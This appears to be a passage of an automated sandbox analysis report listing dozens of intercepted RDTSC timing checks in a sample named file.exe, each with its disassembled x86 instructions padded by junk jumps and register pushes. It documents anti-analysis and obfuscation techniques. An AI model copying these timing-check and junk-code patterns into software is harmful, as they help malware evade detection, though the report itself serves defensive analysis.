Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9092D second address: 4D909B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FFAA4B0AF1Dh 0x0000000a jmp 00007FFAA4B0AF1Bh 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, dword ptr [ebx+20h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FFAA4B0AF24h 0x0000001d jmp 00007FFAA4B0AF25h 0x00000022 popfd 0x00000023 mov esi, 463AA387h 0x00000028 popad 0x00000029 mov dword ptr [esi+40h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FFAA4B0AF1Fh 0x00000035 add ah, 0000004Eh 0x00000038 jmp 00007FFAA4B0AF29h 0x0000003d popfd 0x0000003e mov ch, 82h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D909B9 second address: 4D90A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAA4EF80D8h 0x00000009 add eax, 5C9A9DF8h 0x0000000f jmp 00007FFAA4EF80CBh 0x00000014 popfd 0x00000015 movzx ecx, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b lea eax, dword ptr [ebx+00000080h] 0x00000021 jmp 00007FFAA4EF80CBh 0x00000026 push 00000001h 0x00000028 jmp 00007FFAA4EF80D6h 0x0000002d nop 0x0000002e jmp 00007FFAA4EF80D0h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FFAA4EF80CCh 0x0000003d sub ecx, 773089E8h 0x00000043 jmp 00007FFAA4EF80CBh 0x00000048 popfd 0x00000049 mov si, 2DDFh 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90A4F second address: 4D90A8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007FFAA4B0AF1Ch 0x0000000c jmp 00007FFAA4B0AF25h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FFAA4B0AF1Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90A8B second address: 4D90ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FFAA4EF80D3h 0x00000015 sbb si, C49Eh 0x0000001a jmp 00007FFAA4EF80D9h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90ADC second address: 4D90AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90AE1 second address: 4D90B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b mov eax, 33AA7157h 0x00000010 jmp 00007FFAA4EF80CCh 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90B53 second address: 4D90C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 5FA3h 0x00000008 popad 0x00000009 popad 0x0000000a mov edi, eax 0x0000000c jmp 00007FFAA4B0AF26h 0x00000011 test edi, edi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FFAA4B0AF1Eh 0x0000001a adc al, 00000018h 0x0000001d jmp 00007FFAA4B0AF1Bh 0x00000022 popfd 0x00000023 jmp 00007FFAA4B0AF28h 0x00000028 popad 0x00000029 js 00007FFB14B79A2Ah 0x0000002f jmp 00007FFAA4B0AF20h 0x00000034 mov eax, dword ptr [ebp-0Ch] 0x00000037 pushad 0x00000038 jmp 00007FFAA4B0AF1Eh 0x0000003d pushfd 0x0000003e jmp 00007FFAA4B0AF22h 0x00000043 and ch, 00000008h 0x00000046 jmp 00007FFAA4B0AF1Bh 0x0000004b popfd 0x0000004c popad 0x0000004d mov dword ptr [esi+04h], eax 0x00000050 jmp 00007FFAA4B0AF26h 0x00000055 lea eax, dword ptr [ebx+78h] 0x00000058 jmp 00007FFAA4B0AF20h 0x0000005d push 00000001h 0x0000005f pushad 0x00000060 mov di, cx 0x00000063 pushfd 0x00000064 jmp 00007FFAA4B0AF1Ah 0x00000069 xor esi, 317B98C8h 0x0000006f jmp 00007FFAA4B0AF1Bh 0x00000074 popfd 0x00000075 popad 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007FFAA4B0AF25h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90D3B second address: 4D90D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90D3F second address: 4D90D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90D53 second address: 4D90D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90D59 second address: 4D90D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90D5D second address: 4D90D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90D61 second address: 4D90DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007FFAA4B0AF29h 0x0000000f test edi, edi 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 pushfd 0x00000016 jmp 00007FFAA4B0AF28h 0x0000001b or ax, 3158h 0x00000020 jmp 00007FFAA4B0AF1Bh 0x00000025 popfd 0x00000026 popad 0x00000027 js 00007FFB14B7981Ah 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FFAA4B0AF1Bh 0x00000036 sbb ax, 501Eh 0x0000003b jmp 00007FFAA4B0AF29h 0x00000040 popfd 0x00000041 mov edx, ecx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90DEC second address: 4D90E06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90E06 second address: 4D90E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90E19 second address: 4D90EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FFAA4EF80CEh 0x00000011 lea eax, dword ptr [ebx+70h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFAA4EF80CEh 0x0000001b or ax, 4A08h 0x00000020 jmp 00007FFAA4EF80CBh 0x00000025 popfd 0x00000026 call 00007FFAA4EF80D8h 0x0000002b mov cx, 0881h 0x0000002f pop esi 0x00000030 popad 0x00000031 push 00000001h 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FFAA4EF80D9h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90EA7 second address: 4D90EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, 5ED1h 0x0000000d popad 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90EC7 second address: 4D90EE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90EE0 second address: 4D90F1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, FE22h 0x00000007 push edx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FFAA4B0AF24h 0x00000012 nop 0x00000013 pushad 0x00000014 mov edi, ecx 0x00000016 mov ecx, 365674C9h 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp-18h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FFAA4B0AF1Bh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90F1B second address: 4D90F55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAA4EF80D8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90F55 second address: 4D90F64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90F64 second address: 4D90F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90F6A second address: 4D90F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAA4B0AF1Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91029 second address: 4D9102D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9102D second address: 4D91044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91044 second address: 4D9104A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9104A second address: 4D91060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAA4B0AF1Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91060 second address: 4D910C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FFB14F66706h 0x0000000f jmp 00007FFAA4EF80D6h 0x00000014 mov eax, dword ptr [ebp-14h] 0x00000017 jmp 00007FFAA4EF80D0h 0x0000001c mov ecx, esi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FFAA4EF80CCh 0x00000027 or ecx, 60CEA0D8h 0x0000002d jmp 00007FFAA4EF80CBh 0x00000032 popfd 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D910C2 second address: 4D910DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Fh 0x00000009 popad 0x0000000a mov dword ptr [esi+0Ch], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D910DF second address: 4D910E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D910E3 second address: 4D910E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D910E9 second address: 4D91106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4EF80D9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91106 second address: 4D91140 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, 74E806ECh 0x00000010 jmp 00007FFAA4B0AF1Eh 0x00000015 sub eax, eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFAA4B0AF1Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91140 second address: 4D911B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAA4EF80D1h 0x00000009 adc si, 2496h 0x0000000e jmp 00007FFAA4EF80D1h 0x00000013 popfd 0x00000014 jmp 00007FFAA4EF80D0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c lock cmpxchg dword ptr [edx], ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FFAA4EF80CDh 0x00000028 pushfd 0x00000029 jmp 00007FFAA4EF80D0h 0x0000002e adc ax, AF18h 0x00000033 jmp 00007FFAA4EF80CBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D911B6 second address: 4D911E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 jmp 00007FFAA4B0AF1Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 call 00007FFAA4B0AF24h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D911E2 second address: 4D91261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edx, 11C8CF54h 0x0000000a popad 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FFAA4EF80D4h 0x00000014 sbb eax, 690C4308h 0x0000001a jmp 00007FFAA4EF80CBh 0x0000001f popfd 0x00000020 popad 0x00000021 jne 00007FFB14F6658Ah 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FFAA4EF80D4h 0x0000002e sub esi, 2C05E568h 0x00000034 jmp 00007FFAA4EF80CBh 0x00000039 popfd 0x0000003a mov ax, 8F5Fh 0x0000003e popad 0x0000003f mov edx, dword ptr [ebp+08h] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FFAA4EF80D1h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91261 second address: 4D912CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAA4B0AF27h 0x00000009 adc ecx, 21E13E0Eh 0x0000000f jmp 00007FFAA4B0AF29h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi] 0x0000001c jmp 00007FFAA4B0AF1Ch 0x00000021 mov dword ptr [edx], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FFAA4B0AF27h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D912CA second address: 4D9133C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAA4EF80CFh 0x00000008 jmp 00007FFAA4EF80D8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esi+04h] 0x00000013 jmp 00007FFAA4EF80D0h 0x00000018 mov dword ptr [edx+04h], eax 0x0000001b jmp 00007FFAA4EF80D0h 0x00000020 mov eax, dword ptr [esi+08h] 0x00000023 pushad 0x00000024 mov bx, ax 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b popad 0x0000002c mov dword ptr [edx+08h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FFAA4EF80CEh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9133C second address: 4D91368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov bx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+0Ch] 0x0000000f jmp 00007FFAA4B0AF24h 0x00000014 mov dword ptr [edx+0Ch], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91368 second address: 4D9136C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9136C second address: 4D91370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91370 second address: 4D91376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91376 second address: 4D913D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFAA4B0AF22h 0x00000008 pop ecx 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esi+10h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FFAA4B0AF26h 0x00000019 pushfd 0x0000001a jmp 00007FFAA4B0AF22h 0x0000001f and esi, 51891058h 0x00000025 jmp 00007FFAA4B0AF1Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D913D3 second address: 4D913EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4EF80D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D913EB second address: 4D913EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D913EF second address: 4D9141B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+10h], eax 0x0000000b jmp 00007FFAA4EF80D7h 0x00000010 mov eax, dword ptr [esi+14h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9141B second address: 4D91421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91421 second address: 4D91425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91425 second address: 4D9143F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9143F second address: 4D91480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, EABCh 0x00000007 pushfd 0x00000008 jmp 00007FFAA4EF80D5h 0x0000000d sub cx, E016h 0x00000012 jmp 00007FFAA4EF80D1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esi+18h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ecx, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91480 second address: 4D91485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91485 second address: 4D914FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c jmp 00007FFAA4EF80D0h 0x00000011 mov eax, dword ptr [esi+1Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FFAA4EF80CDh 0x0000001d or ch, FFFFFF86h 0x00000020 jmp 00007FFAA4EF80D1h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FFAA4EF80D0h 0x0000002c and eax, 5920E028h 0x00000032 jmp 00007FFAA4EF80CBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D914FB second address: 4D91501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91501 second address: 4D91505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91505 second address: 4D9154B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+1Ch], eax 0x0000000e jmp 00007FFAA4B0AF26h 0x00000013 mov eax, dword ptr [esi+20h] 0x00000016 jmp 00007FFAA4B0AF20h 0x0000001b mov dword ptr [edx+20h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9154B second address: 4D91568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91568 second address: 4D9156E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9156E second address: 4D915B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+24h] 0x0000000e pushad 0x0000000f mov bx, si 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FFAA4EF80CEh 0x0000001a xor esi, 5F7CECD8h 0x00000020 jmp 00007FFAA4EF80CBh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D915B1 second address: 4D915D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [edx+24h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D915D5 second address: 4D915F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FFAA4EF80CAh 0x00000009 pop eax 0x0000000a popad 0x0000000b mov cx, dx 0x0000000e popad 0x0000000f mov eax, dword ptr [esi+28h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D915F2 second address: 4D915F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D915F6 second address: 4D9160C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9160C second address: 4D9161E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9161E second address: 4D91635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAA4EF80CAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91635 second address: 4D91674 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [esi+2Ch] 0x0000000e jmp 00007FFAA4B0AF24h 0x00000013 mov dword ptr [edx+2Ch], ecx 0x00000016 jmp 00007FFAA4B0AF20h 0x0000001b mov ax, word ptr [esi+30h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91674 second address: 4D91678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91678 second address: 4D9167E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
